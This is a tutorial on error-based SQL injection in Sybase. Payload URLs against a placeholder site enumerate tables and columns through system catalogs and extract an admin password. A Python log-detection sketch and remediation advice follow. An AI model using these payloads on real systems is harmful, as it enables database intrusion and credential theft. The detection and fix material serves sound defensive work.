Sybase SQL injection


DBMS version

http://test.com/index.php?idx=1 or 1=convert(numeric,(select @@version))#
=> Adaptive Server Enterprise/12.5.3/EBF 13325

current_db

http://test.com/index.php?idx=1 or 1=convert(numeric,(select db_name()))# // current_db
=> testdb

Tables of current_db

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55))#
=> members:123456

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55 and id not in(123456)))#
=> temp:24680

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55 and id not in(123456,24680)))#
=> admin_member:74653

Columns of selected table (admin_member)

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653))#
=> name:10

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653 and colid not in(10)))#
=> id:1

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653 and colid not in(10,1)))#
=> passwd:2

Data of selected table (admin_member)

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||id||0x3a||passwd) from admin_member))#
=> admin:1234

max(): descending order
min(): ascending order
convert(datatype,value): converts value to the specified data type
sysobjects: One row for each table, view, procedure, rule, trigger, default, log, and (in tempdb only) temporary object
syscolumns: One row for each column in a table or view, and for each parameter in a procedure
type 0x55 = 'U': table created by a user
not in(data): excludes the items contained in data
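The requests above share a recognizable shape in web access logs: a parameter that should be an integer carries convert(numeric,(select ...)), references to sysobjects/syscolumns, and a growing not in(...) list. The following detection sketch is an added example, not part of the original post; the log lines are constructed, and the rule names and the assumption that idx must be an integer are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log entries (client, request URL); not real traffic.
SAMPLE_LOG = [
    ("203.0.113.5", "/index.php?idx=1"),
    ("203.0.113.9", "/index.php?idx=1%20or%201=convert(numeric,(select%20db_name()))%23"),
    ("203.0.113.9", "/index.php?idx=1+or+1=CONVERT(numeric,(select+min(name||0x3a||convert(char,id))+from+testdb..sysobjects+where+type=0x55))%23"),
    ("203.0.113.9", "/index.php?idx=1+or+1=convert(numeric,(select+min(name)+from+testdb..syscolumns+where+id=74653+and+colid+not+in(10,1)))%23"),
    ("203.0.113.7", "/index.php?idx=42&q=how+to+convert+numeric+types"),
]

# Illustrative rule names; each regex runs on the decoded, lower-cased value.
RULES = {
    "error_based_convert": re.compile(r"convert\s*\(\s*(numeric|int)\w*\s*,\s*\(\s*select\b"),
    "catalog_enumeration": re.compile(r"\bsys(objects|columns)\b"),
    "not_in_iteration": re.compile(r"\bnot\s+in\s*\("),
}
NUMERIC_PARAMS = {"idx"}  # assumption: parameters the application expects to be integers

def inspect(url):
    """Return sorted rule names matched by integer parameters of one request."""
    hits = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS or re.fullmatch(r"\s*-?\d+\s*", value):
            continue  # not a watched parameter, or a clean integer
        hits.add("non_integer_value")
        text = re.sub(r"\s+", " ", value.lower())
        hits.update(rule for rule, rx in RULES.items() if rx.search(text))
    return sorted(hits)

def summarize(log):
    """Group findings per client so a walk through the catalog stands out."""
    report = {}
    for client, url in log:
        hits = inspect(url)
        if hits:
            entry = report.setdefault(client, {"requests": 0, "rules": set()})
            entry["requests"] += 1
            entry["rules"].update(hits)
    return report

if __name__ == "__main__":
    for client, entry in summarize(SAMPLE_LOG).items():
        print(client, entry["requests"], sorted(entry["rules"]))
```

The technique depends on the application concatenating idx into the query and returning the database's conversion error to the client, so binding idx as an integer parameter and suppressing database error output removes both conditions.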